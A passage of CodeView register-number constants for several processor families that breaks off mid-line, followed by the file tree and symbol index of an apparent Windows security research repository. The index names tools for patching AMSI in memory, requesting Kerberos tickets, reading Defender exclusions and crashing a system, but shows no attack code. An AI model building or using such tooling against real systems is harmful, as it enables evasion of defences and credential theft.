CV_REG_YMM5F4 = 344,
CV_REG_YMM5F5 = 345,
CV_REG_YMM5F6 = 346,
CV_REG_YMM5F7 = 347,
CV_REG_YMM6F0 = 348,
CV_REG_YMM6F1 = 349,
CV_REG_YMM6F2 = 350,
CV_REG_YMM6F3 = 351,
CV_REG_YMM6F4 = 352,
CV_REG_YMM6F5 = 353,
CV_REG_YMM6F6 = 354,
CV_REG_YMM6F7 = 355,
CV_REG_YMM7F0 = 356,
CV_REG_YMM7F1 = 357,
CV_REG_YMM7F2 = 358,
CV_REG_YMM7F3 = 359,
CV_REG_YMM7F4 = 360,
CV_REG_YMM7F5 = 361,
CV_REG_YMM7F6 = 362,
CV_REG_YMM7F7 = 363,
CV_REG_YMM0D0 = 364, // AVX floating-point double precise registers
CV_REG_YMM0D1 = 365,
CV_REG_YMM0D2 = 366,
CV_REG_YMM0D3 = 367,
CV_REG_YMM1D0 = 368,
CV_REG_YMM1D1 = 369,
CV_REG_YMM1D2 = 370,
CV_REG_YMM1D3 = 371,
CV_REG_YMM2D0 = 372,
CV_REG_YMM2D1 = 373,
CV_REG_YMM2D2 = 374,
CV_REG_YMM2D3 = 375,
CV_REG_YMM3D0 = 376,
CV_REG_YMM3D1 = 377,
CV_REG_YMM3D2 = 378,
CV_REG_YMM3D3 = 379,
CV_REG_YMM4D0 = 380,
CV_REG_YMM4D1 = 381,
CV_REG_YMM4D2 = 382,
CV_REG_YMM4D3 = 383,
CV_REG_YMM5D0 = 384,
CV_REG_YMM5D1 = 385,
CV_REG_YMM5D2 = 386,
CV_REG_YMM5D3 = 387,
CV_REG_YMM6D0 = 388,
CV_REG_YMM6D1 = 389,
CV_REG_YMM6D2 = 390,
CV_REG_YMM6D3 = 391,
CV_REG_YMM7D0 = 392,
CV_REG_YMM7D1 = 393,
CV_REG_YMM7D2 = 394,
CV_REG_YMM7D3 = 395,
CV_REG_BND0 = 396, // x86 MPX bounds registers
CV_REG_BND1 = 397,
CV_REG_BND2 = 398,
CV_REG_BND3 = 399,
CV_REG_BNDCFGU = 400,
CV_REG_BNDSTATUS = 401,
CV_REG_ZMM0 = 402, // AVX-512 registers
CV_REG_ZMM1 = 403,
CV_REG_ZMM2 = 404,
CV_REG_ZMM3 = 405,
CV_REG_ZMM4 = 406,
CV_REG_ZMM5 = 407,
CV_REG_ZMM6 = 408,
CV_REG_ZMM7 = 409,
CV_REG_ZMM0H = 410,
CV_REG_ZMM1H = 411,
CV_REG_ZMM2H = 412,
CV_REG_ZMM3H = 413,
CV_REG_ZMM4H = 414,
CV_REG_ZMM5H = 415,
CV_REG_ZMM6H = 416,
CV_REG_ZMM7H = 417,
CV_REG_K0 = 418,
CV_REG_K1 = 419,
CV_REG_K2 = 420,
CV_REG_K3 = 421,
CV_REG_K4 = 422,
CV_REG_K5 = 423,
CV_REG_K6 = 424,
CV_REG_K7 = 425,
CV_REG_SSP = 426, // CET- Shadow Stack Pointer
// registers for the 68K processors
CV_R68_D0 = 0,
CV_R68_D1 = 1,
CV_R68_D2 = 2,
CV_R68_D3 = 3,
CV_R68_D4 = 4,
CV_R68_D5 = 5,
CV_R68_D6 = 6,
CV_R68_D7 = 7,
CV_R68_A0 = 8,
CV_R68_A1 = 9,
CV_R68_A2 = 10,
CV_R68_A3 = 11,
CV_R68_A4 = 12,
CV_R68_A5 = 13,
CV_R68_A6 = 14,
CV_R68_A7 = 15,
CV_R68_CCR = 16,
CV_R68_SR = 17,
CV_R68_USP = 18,
CV_R68_MSP = 19,
CV_R68_SFC = 20,
CV_R68_DFC = 21,
CV_R68_CACR = 22,
CV_R68_VBR = 23,
CV_R68_CAAR = 24,
CV_R68_ISP = 25,
CV_R68_PC = 26,
//reserved 27
CV_R68_FPCR = 28,
CV_R68_FPSR = 29,
CV_R68_FPIAR = 30,
//reserved 31
CV_R68_FP0 = 32,
CV_R68_FP1 = 33,
CV_R68_FP2 = 34,
CV_R68_FP3 = 35,
CV_R68_FP4 = 36,
CV_R68_FP5 = 37,
CV_R68_FP6 = 38,
CV_R68_FP7 = 39,
//reserved 40
CV_R68_MMUSR030 = 41,
CV_R68_MMUSR = 42,
CV_R68_URP = 43,
CV_R68_DTT0 = 44,
CV_R68_DTT1 = 45,
CV_R68_ITT0 = 46,
CV_R68_ITT1 = 47,
//reserved 50
CV_R68_PSR = 51,
CV_R68_PCSR = 52,
CV_R68_VAL = 53,
CV_R68_CRP = 54,
CV_R68_SRP = 55,
CV_R68_DRP = 56,
CV_R68_TC = 57,
CV_R68_AC = 58,
CV_R68_SCC = 59,
CV_R68_CAL = 60,
CV_R68_TT0 = 61,
CV_R68_TT1 = 62,
//reserved 63
CV_R68_BAD0 = 64,
CV_R68_BAD1 = 65,
CV_R68_BAD2 = 66,
CV_R68_BAD3 = 67,
CV_R68_BAD4 = 68,
CV_R68_BAD5 = 69,
CV_R68_BAD6 = 70,
CV_R68_BAD7 = 71,
CV_R68_BAC0 = 72,
CV_R68_BAC1 = 73,
CV_R68_BAC2 = 74,
CV_R68_BAC3 = 75,
CV_R68_BAC4 = 76,
CV_R68_BAC5 = 77,
CV_R68_BAC6 = 78,
CV_R68_BAC7 = 79,
// Register set for the MIPS 4000
CV_M4_NOREG = CV_REG_NONE,
CV_M4_IntZERO = 10, /* CPU REGISTER */
CV_M4_IntAT = 11,
CV_M4_IntV0 = 12,
CV_M4_IntV1 = 13,
CV_M4_IntA0 = 14,
CV_M4_IntA1 = 15,
CV_M4_IntA2 = 16,
CV_M4_IntA3 = 17,
CV_M4_IntT0 = 18,
CV_M4_IntT1 = 19,
CV_M4_IntT2 = 20,
CV_M4_IntT3 = 21,
CV_M4_IntT4 = 22,
CV_M4_IntT5 = 23,
CV_M4_IntT6 = 24,
CV_M4_IntT7 = 25,
CV_M4_IntS0 = 26,
CV_M4_IntS1 = 27,
CV_M4_IntS2 = 28,
CV_M4_IntS3 = 29,
CV_M4_IntS4 = 30,
CV_M4_IntS5 = 31,
CV_M4_IntS6 = 32,
CV_M4_IntS7 = 33,
CV_M4_IntT8 = 34,
CV_M4_IntT9 = 35,
CV_M4_IntKT0 = 36,
CV_M4_IntKT1 = 37,
CV_M4_IntGP = 38,
CV_M4_IntSP = 39,
CV_M4_IntS8 = 40,
CV_M4_IntRA = 41,
CV_M4_IntLO = 42,
CV_M4_IntHI = 43,
CV_M4_Fir = 50,
CV_M4_Psr = 51,
CV_M4_FltF0 = 60, /* Floating point registers */
CV_M4_FltF1 = 61,
CV_M4_FltF2 = 62,
CV_M4_FltF3 = 63,
CV_M4_FltF4 = 64,
CV_M4_FltF5 = 65,
CV_M4_FltF6 = 66,
CV_M4_FltF7 = 67,
CV_M4_FltF8 = 68,
CV_M4_FltF9 = 69,
CV_M4_FltF10 = 70,
CV_M4_FltF11 = 71,
CV_M4_FltF12 = 72,
CV_M4_FltF13 = 73,
CV_M4_FltF14 = 74,
CV_M4_FltF15 = 75,
CV_M4_FltF16 = 76,
CV_M4_FltF17 = 77,
CV_M4_FltF18 = 78,
CV_M4_FltF19 = 79,
CV_M4_FltF20 = 80,
CV_M4_FltF21 = 81,
CV_M4_FltF22 = 82,
CV_M4_FltF23 = 83,
CV_M4_FltF24 = 84,
CV_M4_FltF25 = 85,
CV_M4_FltF26 = 86,
CV_M4_FltF27 = 87,
CV_M4_FltF28 = 88,
CV_M4_FltF29 = 89,
CV_M4_FltF30 = 90,
CV_M4_FltF31 = 91,
CV_M4_FltFsr = 92,
// Register set for the ALPHA AXP
CV_ALPHA_NOREG = CV_REG_NONE,
CV_ALPHA_FltF0 = 10, // Floating point registers
CV_ALPHA_FltF1 = 11,
CV_ALPHA_FltF2 = 12,
CV_ALPHA_FltF3 = 13,
CV_ALPHA_FltF4 = 14,
CV_ALPHA_FltF5 = 15,
CV_ALPHA_FltF6 = 16,
CV_ALPHA_FltF7 = 17,
CV_ALPHA_FltF8 = 18,
CV_ALPHA_FltF9 = 19,
CV_ALPHA_FltF10 = 20,
CV_ALPHA_FltF11 = 21,
CV_ALPHA_FltF12 = 22,
CV_ALPHA_FltF13 = 23,
CV_ALPHA_FltF14 = 24,
CV_ALPHA_FltF15 = 25,
CV_ALPHA_FltF16 = 26,
CV_ALPHA_FltF17 = 27,
CV_ALPHA_FltF18 = 28,
CV_ALPHA_FltF19 = 29,
CV_ALPHA_FltF20 = 30,
CV_ALPHA_FltF21 = 31,
CV_ALPHA_FltF22 = 32,
CV_ALPHA_FltF23 = 33,
CV_ALPHA_FltF24 = 34,
CV_ALPHA_FltF25 = 35,
CV_ALPHA_FltF26 = 36,
CV_ALPHA_FltF27 = 37,
CV_ALPHA_FltF28 = 38,
CV_ALPHA_FltF29 = 39,
CV_ALPHA_FltF30 = 40,
CV_ALPHA_FltF31 = 41,
CV_ALPHA_IntV0 = 42, // Integer registers
CV_ALPHA_IntT0 = 43,
CV_ALPHA_IntT1 = 44,
CV_ALPHA_IntT2 = 45,
CV_ALPHA_IntT3 = 46,
CV_ALPHA_IntT4 = 47,
CV_ALPHA_IntT5 = 48,
CV_ALPHA_IntT6 = 49,
CV_ALPHA_IntT7 = 50,
CV_ALPHA_IntS0 = 51,
CV_ALPHA_IntS1 = 52,
CV_ALPHA_IntS2 = 53,
CV_ALPHA_IntS3 = 54,
CV_ALPHA_IntS4 = 55,
CV_ALPHA_IntS5 = 56,
CV_ALPHA_IntFP = 57,
CV_ALPHA_IntA0 = 58,
CV_ALPHA_IntA1 = 59,
CV_ALPHA_IntA2 = 60,
CV_ALPHA_IntA3 = 61,
CV_ALPHA_IntA4 = 62,
CV_ALPHA_IntA5 = 63,
CV_ALPHA_IntT8 = 64,
CV_ALPHA_IntT9 = 65,
CV_ALPHA_IntT10 = 66,
CV_ALPHA_IntT11 = 67,
CV_ALPHA_IntRA = 68,
CV_ALPHA_IntT12 = 69,
CV_ALPHA_IntAT = 70,
CV_ALPHA_IntGP = 71,
CV_ALPHA_IntSP = 72,
CV_ALPHA_IntZERO = 73,
CV_ALPHA_Fpcr = 74, // Control registers
CV_ALPHA_Fir = 75,
CV_ALPHA_Psr = 76,
CV_ALPHA_FltFsr = 77,
CV_ALPHA_SoftFpcr = 78,
// Register Set for Motorola/IBM PowerPC
/*
** PowerPC General Registers ( User Level )
*/
CV_PPC_GPR0 = 1,
CV_PPC_GPR1 = 2,
CV_PPC_GPR2 = 3,
CV_PPC_GPR3 = 4,
CV_PPC_GPR4 = 5,
CV_PPC_GPR5 = 6,
CV_PPC_GPR6 = 7,
CV_PPC_GPR7 = 8,
CV_PPC_GPR8 = 9,
CV_PPC_GPR9 = 10,
CV_PPC_GPR10 = 11,
CV_PPC_GPR11 = 12,
CV_PPC_GPR12 = 13,
CV_PPC_GPR13 = 14,
CV_PPC_GPR14 = 15,
CV_PPC_GPR15 = 16,
CV_PPC_GPR16 = 17,
CV_PPC_GPR17 = 18,
CV_PPC_GPR18 = 19,
CV_PPC_GPR19 = 20,
CV_PPC_GPR20 = 21,
CV_PPC_GPR21 = 22,
CV_PPC_GPR22 = 23,
CV_PPC_GPR23 = 24,
CV_PPC_GPR24 = 25,
CV_PPC_GPR25 = 26,
CV_PPC_GPR26 = 27,
CV_PPC_GPR27 = 28,
CV_PPC_GPR28 = 29,
CV_PPC_GPR29 = 30,
CV_PPC_GPR30 = 31,
CV_PPC_GPR31 = 32,
/*
** PowerPC Condition Register ( User Level )
*/
CV_PPC_CR = 33,
CV_PPC_CR0 = 34,
CV_PPC_CR1 = 35,
CV_PPC_CR2 = 36,
CV_PPC_CR3 = 37,
CV_PPC_CR4 = 38,
CV_PPC_CR5 = 39,
CV_PPC_CR6 = 40,
CV_PPC_CR7 = 41,
/*
** PowerPC Floating Point Registers ( User Level )
*/
CV_PPC_FPR0 = 42,
CV_PPC_FPR1 = 43,
CV_PPC_FPR2 = 44,
CV_PPC_FPR3 = 45,
CV_PPC_FPR4 = 46,
CV_PPC_FPR5 = 47,
CV_PPC_FPR6 = 48,
CV_PPC_FPR7 = 49,
CV_PPC_FPR8 = 50,
CV_PPC_FPR9 = 51,
CV_PPC_FPR10 = 52,
CV_PPC_FPR11 = 53,
CV_PPC_FPR12 = 54,
CV_PPC_FPR13 = 55,
CV_PPC_FPR14 = 56,
CV_PPC_FPR15 = 57,
CV_PPC_FPR16 = 58,
CV_PPC_FPR17 = 59,
CV_PPC_FPR18 = 60,
CV_PPC_FPR19 = 61,
CV_PPC_FPR20 = 62,
CV_PPC_FPR21 = 63,
CV_PPC_FPR22 = 64,
CV_PPC_FPR23 = 65,
CV_PPC_FPR24 = 66,
CV_PPC_FPR25 = 67,
CV_PPC_FPR26 = 68,
CV_PPC_FPR27 = 69,
CV_PPC_FPR28 = 70,
CV_PPC_FPR29 = 71,
CV_PPC_FPR30 = 72,
CV_PPC_FPR31 = 73,
/*
** PowerPC Floating Point Status and Control Register ( User Level )
*/
CV_PPC_FPSCR = 74,
/*
** PowerPC Machine State Register ( Supervisor Level )
*/
CV_PPC_MSR = 75,
/*
** PowerPC Segment Registers ( Supervisor Level )
*/
CV_PPC_SR0 = 76,
CV_PPC_SR1 = 77,
CV_PPC_SR2 = 78,
CV_PPC_SR3 = 79,
CV_PPC_SR4 = 80,
CV_PPC_SR5 = 81,
CV_PPC_SR6 = 82,
CV_PPC_SR7 = 83,
CV_PPC_SR8 = 84,
CV_PPC_SR9 = 85,
CV_PPC_SR10 = 86,
CV_PPC_SR11 = 87,
CV_PPC_SR12 = 88,
CV_PPC_SR13 = 89,
CV_PPC_SR14 = 90,
CV_PPC_SR15 = 91,
/*
** For all of the special purpose registers add 100 to the SPR# that the
** Motorola/IBM documentation gives with the exception of any imaginary
** registers.
*/
/*
** PowerPC Special Purpose Registers ( User Level )
*/
CV_PPC_PC = 99, // PC (imaginary register)
CV_PPC_MQ = 100, // MPC601
CV_PPC_XER = 101,
CV_PPC_RTCU = 104, // MPC601
CV_PPC_RTCL = 105, // MPC601
CV_PPC_LR = 108,
CV_PPC_CTR = 109,
CV_PPC_COMPARE = 110, // part of XER (internal to the debugger only)
CV_PPC_COUNT = 111, // part of XER (internal to the debugger only)
/*
** PowerPC Special Purpose Registers ( Supervisor Level )
*/
CV_PPC_DSISR = 118,
CV_PPC_DAR = 119,
CV_PPC_DEC = 122,
CV_PPC_SDR1 = 125,
CV_PPC_SRR0 = 126,
CV_PPC_SRR1 = 127,
CV_PPC_SPRG0 = 372,
CV_PPC_SPRG1 = 373,
CV_PPC_SPRG2 = 374,
CV_PPC_SPRG3 = 375,
CV_PPC_ASR = 280, // 64-bit implementations only
CV_PPC_EAR = 382,
CV_PPC_PVR = 287,
CV_PPC_BAT0U = 628,
CV_PPC_BAT0L = 629,
CV_PPC_BAT1U = 630,
CV_PPC_BAT1L = 631,
CV_PPC_BAT2U = 632,
CV_PPC_BAT2L = 633,
CV_PPC_BAT3U = 634,
CV_PPC_BAT3L = 635,
CV_PPC_DBAT0U = 636,
CV_PPC_DBAT0L = 637,
CV_PPC_DBAT1U = 638,
CV_PPC_DBAT1L = 639,
CV_PPC_DBAT2U = 640,
CV_PPC_DBAT2L = 641,
CV_PPC_DBAT3U = 642,
CV_PPC_DBAT3L = 643,
/*
** PowerPC Special Purpose Registers Implementation Dependent ( Supervisor Level )
*/
/*
** Doesn't appear that IBM/Motorola has finished defining these.
*/
CV_PPC_PMR0 = 1044, // MPC620,
CV_PPC_PMR1 = 1045, // MPC620,
CV_PPC_PMR2 = 1046, // MPC620,
CV_PPC_PMR3 = 1047, // MPC620,
CV_PPC_PMR4 = 1048, // MPC620,
CV_PPC_PMR5 = 1049, // MPC620,
CV_PPC_PMR6 = 1050, // MPC620,
CV_PPC_PMR7 = 1051, // MPC620,
CV_PPC_PMR8 = 1052, // MPC620,
CV_PPC_PMR9 = 1053, // MPC620,
CV_PPC_PMR10 = 1054, // MPC620,
CV_PPC_PMR11 = 1055, // MPC620,
CV_PPC_PMR12 = 1056, // MPC620,
CV_PPC_PMR13 = 1057, // MPC620,
CV_PPC_PMR14 = 1058, // MPC620,
CV_PPC_PMR15 = 1059, // MPC620,
CV_PPC_DMISS = 1076, // MPC603
CV_PPC_DCMP = 1077, // MPC603
CV_PPC_HASH1 = 1078, // MPC603
CV_PPC_HASH2 = 1079, // MPC603
CV_PPC_IMISS = 1080, // MPC603
CV_PPC_ICMP = 1081, // MPC603
CV_PPC_RPA = 1082, // MPC603
CV_PPC_HID0 = 1108, // MPC601, MPC603, MPC620
CV_PPC_HID1 = 1109, // MPC601
CV_PPC_HID2 = 1110, // MPC601, MPC603, MPC620 ( IABR )
CV_PPC_HID3 = 1111, // Not Defined
CV_PPC_HID4 = 1112, // Not Defined
CV_PPC_HID5 = 1113, // MPC601, MPC604, MPC620 ( DABR )
CV_PPC_HID6 = 1114, // Not Defined
CV_PPC_HID7 = 1115, // Not Defined
CV_PPC_HID8 = 1116, // MPC620 ( BUSCSR )
CV_PPC_HID9 = 1117, // MPC620 ( L2CSR )
CV_PPC_HID10 = 1118, // Not Defined
CV_PPC_HID11 = 1119, // Not Defined
CV_PPC_HID12 = 1120, // Not Defined
CV_PPC_HID13 = 1121, // MPC604 ( HCR )
CV_PPC_HID14 = 1122, // Not Defined
CV_PPC_HID15 = 1123, // MPC601, MPC604, MPC620 ( PIR )
//
// JAVA VM registers
//
CV_JAVA_PC = 1,
//
// Register set for the Hitachi SH3
//
CV_SH3_NOREG = CV_REG_NONE,
CV_SH3_IntR0 = 10, // CPU REGISTER
CV_SH3_IntR1 = 11,
CV_SH3_IntR2 = 12,
CV_SH3_IntR3 = 13,
CV_SH3_IntR4 = 14,
CV_SH3_IntR5 = 15,
CV_SH3_IntR6 = 16,
CV_SH3_IntR7 = 17,
CV_SH3_IntR8 = 18,
CV_SH3_IntR9 = 19,
CV_SH3_IntR10 = 20,
CV_SH3_IntR11 = 21,
CV_SH3_IntR12 = 22,
CV_SH3_IntR13 = 23,
CV_SH3_IntFp = 24,
CV_SH3_IntSp = 25,
CV_SH3_Gbr = 38,
CV_SH3_Pr = 39,
CV_SH3_Mach = 40,
CV_SH3_Macl = 41,
CV_SH3_Pc = 50,
CV_SH3_Sr = 51,
CV_SH3_BarA = 60,
CV_SH3_BasrA = 61,
CV_SH3_BamrA = 62,
CV_SH3_BbrA = 63,
CV_SH3_BarB = 64,
CV_SH3_BasrB = 65,
CV_SH3_BamrB = 66,
CV_SH3_BbrB = 67,
CV_SH3_BdrB = 68,
CV_SH3_BdmrB = 69,
CV_SH3_Brcr = 70,
//
// Additional registers for Hitachi SH processors
//
CV_SH_Fpscr = 75, // floating point status/control register
CV_SH_Fpul = 76, // floating point communication register
CV_SH_FpR0 = 80, // Floating point registers
CV_SH_FpR1 = 81,
CV_SH_FpR2 = 82,
CV_SH_FpR3 = 83,
CV_SH_FpR4 = 84,
CV_SH_FpR5 = 85,
CV_SH_FpR6 = 86,
CV_SH_FpR7 = 87,
CV_SH_FpR8 = 88,
CV_SH_FpR9 = 89,
CV_SH_FpR10 = 90,
CV_SH_FpR11 = 91,
CV_SH_FpR12 = 92,
CV_SH_FpR13 = 93,
CV_SH_FpR14 = 94,
CV_SH_FpR15 = 95,
CV_SH_XFpR0 = 96,
CV_SH_XFpR1 = 97,
CV_SH_XFpR2 = 98,
CV_SH_XFpR3 = 99,
CV_SH_XFpR4 = 100,
CV_SH_XFpR5 = 101,
CV_SH_XFpR6 = 102,
CV_SH_XFpR7 = 103,
CV_SH_XFpR8 = 104,
CV_SH_XFpR9 = 105,
CV_SH_XFpR10 = 106,
CV_SH_XFpR11 = 107,
CV_SH_XFpR12 = 108,
CV_SH_XFpR13 = 109,
CV_SH_XFpR14 = 110,
CV_SH_XFpR15 = 111,
//
// Register set for the ARM processor.
//
CV_ARM_NOREG = CV_REG_NONE,
CV_ARM_R0 = 10,
CV_ARM_R1 = 11,
CV_ARM_R2 = 12,
CV_ARM_R3 = 13,
CV_ARM_R4 = 14,
CV_ARM_R5 = 15,
CV_ARM_R6 = 16,
CV_ARM_R7 = 17,
CV_ARM_R8 = 18,
CV_ARM_R9 = 19,
CV_ARM_R10 = 20,
CV_ARM_R11 = 21, // Frame pointer, if allocated
CV_ARM_R12 = 22,
CV_ARM_SP = 23, // Stack pointer
CV_ARM_LR = 24, // Link Register
CV_ARM_PC = 25, // Program counter
CV_ARM_CPSR = 26, // Current program status register
CV_ARM_ACC0 = 27, // DSP co-processor 0 40 bit accumulator
//
// Registers for ARM VFP10 support
//
CV_ARM_FPSCR = 40,
CV_ARM_FPEXC = 41,
CV_ARM_FS0 = 50,
CV_ARM_FS1 = 51,
CV_ARM_FS2 = 52,
CV_ARM_FS3 = 53,
CV_ARM_FS4 = 54,
CV_ARM_FS5 = 55,
CV_ARM_FS6 = 56,
CV_ARM_FS7 = 57,
CV_ARM_FS8 = 58,
CV_ARM_FS9 = 59,
CV_ARM_FS10 = 60,
CV_ARM_FS11 = 61,
CV_ARM_FS12 = 62,
CV_ARM_FS13 = 63,
CV_ARM_FS14 = 64,
CV_ARM_FS15 = 65,
CV_ARM_FS16 = 66,
CV_ARM_FS17 = 67,
CV_ARM_FS18 = 68,
CV_ARM_FS19 = 69,
CV_ARM_FS20 = 70,
CV_ARM_FS21 = 71,
CV_ARM_FS22 = 72,
CV_ARM_FS23 = 73,
CV_ARM_FS24 = 74,
CV_ARM_FS25 = 75,
CV_ARM_FS26 = 76,
CV_ARM_FS27 = 77,
CV_ARM_FS28 = 78,
CV_ARM_FS29 = 79,
CV_ARM_FS30 = 80,
CV_ARM_FS31 = 81,
//
// ARM VFP Floating Point Extra control registers
//
CV_ARM_FPEXTRA0 = 90,
CV_ARM_FPEXTRA1 = 91,
CV_ARM_FPEXTRA2 = 92,
CV_ARM_FPEXTRA3 = 93,
CV_ARM_FPEXTRA4 = 94,
CV_ARM_FPEXTRA5 = 95,
CV_ARM_FPEXTRA6 = 96,
CV_ARM_FPEXTRA7 = 97,
// XSCALE Concan co-processor registers
CV_ARM_WR0 = 128,
CV_ARM_WR1 = 129,
CV_ARM_WR2 = 130,
CV_ARM_WR3 = 131,
CV_ARM_WR4 = 132,
CV_ARM_WR5 = 133,
CV_ARM_WR6 = 134,
CV_ARM_WR7 = 135,
CV_ARM_WR8 = 136,
CV_ARM_WR9 = 137,
CV_ARM_WR10 = 138,
CV_ARM_WR11 = 139,
CV_ARM_WR12 = 140,
CV_ARM_WR13 = 141,
CV_ARM_WR14 = 142,
CV_ARM_WR15 = 143,
// XSCALE Concan co-processor control registers
CV_ARM_WCID = 144,
CV_ARM_WCON = 145,
CV_ARM_WCSSF = 146,
CV_ARM_WCASF = 147,
CV_ARM_WC4 = 148,
CV_ARM_WC5 = 149,
CV_ARM_WC6 = 150,
CV_ARM_WC7 = 151,
CV_ARM_WCGR0 = 152,
CV_ARM_WCGR1 = 153,
CV_ARM_WCGR2 = 154,
CV_ARM_WCGR3 = 155,
CV_ARM_WC12 = 156,
CV_ARM_WC13 = 157,
CV_ARM_WC14 = 158,
CV_ARM_WC15 = 159,
//
// ARM VFPv3/Neon extended floating Point
//
CV_ARM_FS32 = 200,
CV_ARM_FS33 = 201,
CV_ARM_FS34 =
gitextract_uv3tnufw/
├── .gitignore
├── AMSI/
│ ├── amsi_module_patch.c
│ ├── amsi_scanner.c
│ └── structs.h
├── AppLocker/
│ └── List Policies/
│ ├── interfaces.h
│ └── main.c
├── CMakeLists.txt
├── CMakeSettings.json
├── Cryptography/
│ └── AES CNG/
│ ├── README.md
│ └── source/
│ ├── AES.cpp
│ ├── AES.h
│ ├── AESCrypt.sln
│ ├── AESCrypt.vcxproj
│ ├── AESCrypt.vcxproj.filters
│ ├── Base64.h
│ ├── Main.cpp
│ ├── Util.cpp
│ ├── Util.h
│ └── nthelpers.h
├── DIA/
│ ├── CMakeLists.txt
│ ├── inc/
│ │ ├── callback.h
│ │ ├── dirutil.h
│ │ ├── interface.h
│ │ └── msdia/
│ │ ├── idl/
│ │ │ └── dia2.idl
│ │ ├── include/
│ │ │ ├── cvconst.h
│ │ │ ├── dia2.h
│ │ │ └── diacreate.h
│ │ └── lib/
│ │ ├── amd64/
│ │ │ └── diaguids.lib
│ │ └── diaguids.lib
│ └── src/
│ ├── callback.c
│ ├── dirutil.c
│ ├── interface.c
│ └── main.c
├── Defender/
│ └── ExclusionLists/
│ ├── CMakeLists.txt
│ ├── inc/
│ │ └── defender.h
│ ├── main.c
│ └── src/
│ └── defender.c
├── Fusion/
│ ├── FindAssembly/
│ │ ├── FindAssembly.csproj
│ │ ├── FindAssembly.sln
│ │ ├── Fusion/
│ │ │ ├── GACUtil.cs
│ │ │ ├── IAssemblyCache.cs
│ │ │ ├── IAssemblyCacheItem.cs
│ │ │ ├── IAssemblyEnum.cs
│ │ │ └── IAssemblyName.cs
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── Win32/
│ │ │ ├── Functions.cs
│ │ │ └── Macros.cs
│ │ └── app.config
│ └── ListAssemblies/
│ ├── gacutil.h
│ └── main.c
├── Kerberos/
│ ├── AskTGT/
│ │ ├── CMakeLists.txt
│ │ ├── kerberos.c
│ │ ├── kerberos.h
│ │ ├── main.c
│ │ ├── socket.c
│ │ └── socket.h
│ ├── GetTicket/
│ │ ├── CMakeLists.txt
│ │ └── src/
│ │ └── main.c
│ ├── List/
│ │ ├── CMakeLists.txt
│ │ └── src/
│ │ └── main.c
│ └── Purge/
│ ├── CMakeLists.txt
│ └── src/
│ └── main.c
├── LICENSE
├── Object Manager/
│ ├── List Handles/
│ │ ├── main.c
│ │ └── ntstructs.h
│ └── List Objects/
│ ├── main.c
│ └── ntstructs.h
├── Office/
│ └── Outlook/
│ ├── CMakeLists.txt
│ ├── inc/
│ │ └── outlook.h
│ └── src/
│ ├── main.c
│ └── outlook.c
├── Portable Executable/
│ └── parse_header.c
├── Power Management/
│ ├── README.md
│ ├── deus_somnum_pic.c
│ └── deus_somnum_user32.cpp
├── Process/
│ └── GetProcessEnvironmentBlock/
│ ├── GetProcessEnvironmentBlock/
│ │ ├── GetProcessEnvironmentBlock.csproj
│ │ └── Program.cs
│ └── GetProcessEnvironmentBlock.sln
├── README.md
├── RWX/
│ ├── JITCompilation/
│ │ ├── JITCompilation/
│ │ │ ├── JITCompilation.csproj
│ │ │ └── Program.cs
│ │ └── JITCompilation.sln
│ ├── MMF/
│ │ ├── MMF/
│ │ │ ├── MMF.csproj
│ │ │ └── Program.cs
│ │ └── MMF.sln
│ ├── PInvoke/
│ │ ├── PInvoke/
│ │ │ ├── PInvoke.csproj
│ │ │ └── Program.cs
│ │ └── PInvoke.sln
│ └── README.md
├── Secure Enclave/
│ └── VBS/
│ └── bsod.c
├── Task Scheduler/
│ ├── README.md
│ └── enumerate_tasks.cpp
└── WinDBG/
└── exploit86.js
SYMBOL INDEX (524 symbols across 57 files)
FILE: AMSI/amsi_module_patch.c
function INT (line 71) | INT wmain(INT argc, wchar_t* argv[]) {
function PTEB (line 184) | PTEB RtlGetThreadEnvironmentBlock() {
function PPEB (line 198) | PPEB RtlGetProcessEnvironmentBlock() {
function BOOL (line 220) | BOOL GetRemoteProcessPeb(PHANDLE pHandle, PPEB pRemotePeb, PPROCESS_BASI...
function BOOL (line 254) | BOOL GetLoaderDataStructure(PHANDLE pHandle, PPEB_LDR_DATA pLdrData, LPB...
function DWORD64 (line 286) | DWORD64 djb2(PBYTE str) {
function PVOID (line 310) | PVOID GetModuleBaseAddress(PHANDLE pHandle, PPEB_LDR_DATA pLdrData) {
function BOOL (line 368) | BOOL GetModuleExportDirectory(PHANDLE pHandle, PIMAGE_EXPORT_DIRECTORY p...
function PVOID (line 414) | PVOID GetModuleFunctionAddress(PHANDLE pHandle, PIMAGE_EXPORT_DIRECTORY ...
function BOOL (line 468) | BOOL PatchModuleFunction(PHANDLE pHandle, PVOID lpModuleFunctionAddress) {
FILE: AMSI/amsi_scanner.c
function INT (line 34) | INT wmain(INT argc, PWCHAR argv[]) {
function BOOL (line 113) | BOOL GetStringLenght(LPWSTR szString, PULONG plStringSize) {
function BOOL (line 125) | BOOL ScanString(LPWSTR* pszString, AMSI_RESULT* pAmsiResult) {
function BOOL (line 151) | BOOL ScanFile(LPWSTR* pszFileName, AMSI_RESULT* pAmsiResult) {
function VOID (line 213) | VOID Cleanup() {
FILE: AMSI/structs.h
type PROCESSINFOCLASS (line 7) | enum PROCESSINFOCLASS {
type LSA_UNICODE_STRING (line 11) | typedef struct _LSA_UNICODE_STRING {
type PEB_LDR_DATA (line 17) | typedef struct _PEB_LDR_DATA {
type LDR_MODULE (line 26) | typedef struct _LDR_MODULE {
type PEB (line 42) | typedef struct _PEB {
type CLIENT_ID (line 99) | typedef struct __CLIENT_ID {
type TEB_ACTIVE_FRAME_CONTEXT (line 104) | typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
type TEB_ACTIVE_FRAME (line 109) | typedef struct _TEB_ACTIVE_FRAME {
type GDI_TEB_BATCH (line 115) | typedef struct _GDI_TEB_BATCH {
type PVOID (line 121) | typedef PVOID PACTIVATION_CONTEXT;
type RTL_ACTIVATION_CONTEXT_STACK_FRAME (line 123) | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
type ACTIVATION_CONTEXT_STACK (line 129) | typedef struct _ACTIVATION_CONTEXT_STACK {
type TEB (line 137) | typedef struct _TEB {
type LONG (line 296) | typedef LONG KPRIORITY;
type PROCESS_BASIC_INFORMATION (line 298) | typedef struct _PROCESS_BASIC_INFORMATION {
type LDR_DATA_TABLE_ENTRY (line 307) | typedef struct _LDR_DATA_TABLE_ENTRY {
FILE: AppLocker/List Policies/interfaces.h
type interface (line 27) | typedef interface IAppIdPolicyHandler
